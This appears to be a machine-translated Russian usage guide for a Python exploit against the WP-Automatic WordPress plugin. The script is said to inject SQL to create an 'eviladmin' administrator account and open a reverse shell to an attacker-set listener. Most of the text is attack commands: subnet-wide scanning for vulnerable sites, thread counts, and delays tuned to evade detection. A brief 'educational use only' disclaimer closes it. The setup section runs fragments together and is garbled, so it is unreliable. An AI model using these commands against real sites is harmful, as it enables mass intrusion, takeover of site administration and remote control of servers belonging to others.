Этот скрипт Python автоматизирует процесс создания новой учетной записи администратора на сайте WordPress и выполнения обратной оболочки на целевом сервере. В нем используется уязвимость CSV-инъекции CSV WP-Automatic для выполнения запросов SQL в базе данных WordPress и получения административного доступа.
Сканирование подсети : если вы хотите отсканировать подсеть для уязвимых установок WordPress, вы можете использовать опцию --subnet . Например:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
Эта команда сканирует подсеть 192.168.1.0/24 для сайтов WordPress с уязвимым автоматическим плагином WP и попытается использовать их с помощью предоставленных настройки слушателя.
Настройка задержки : задержка между запросами может быть скорректирована с помощью опции --delay . Более высокая задержка может помочь избежать обнаружения или ограничения скорости, в то время как более низкая задержка может ускорить процесс эксплуатации. Например:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
Эта команда будет использовать задержку 2,5 секунды между запросами.
Использование удаленного слушателя : если ваш слушатель настроен на удаленной машине, вы можете указать его IP -адрес и порт, используя параметры --lhost и --lport . Например:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
Эта команда подключится к слушателю на 192.168.1.100:8080 .
Увеличение количества потоков : вы можете увеличить количество потоков, используемых сценарием с помощью опции --threads . Это может ускорить процесс эксплуатации, но также может повысить вероятность обнаружения или вызвать проблемы с ограничением скорости. Например:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
Эта команда будет использовать 20 потоков для эксплуатации.
requests библиотеки (установка через pip install requests )domain в сценарии на URL -адрес целевого сайта WordPress.eviladmin , установит пароль и назначит административные привилегии.ПРИМЕЧАНИЕ. Убедитесь, что у вас есть надлежащее разрешение и разрешения перед выполнением этого сценария, поскольку он может привести к уязвимости безопасности и юридическим последствиям, если он используется.
Этот сценарий предоставляется только для образовательных и тестирования. Автор не несет ответственности за какое -либо несанкционированное или незаконное использование этого сценария. Используйте его на свой собственный риск.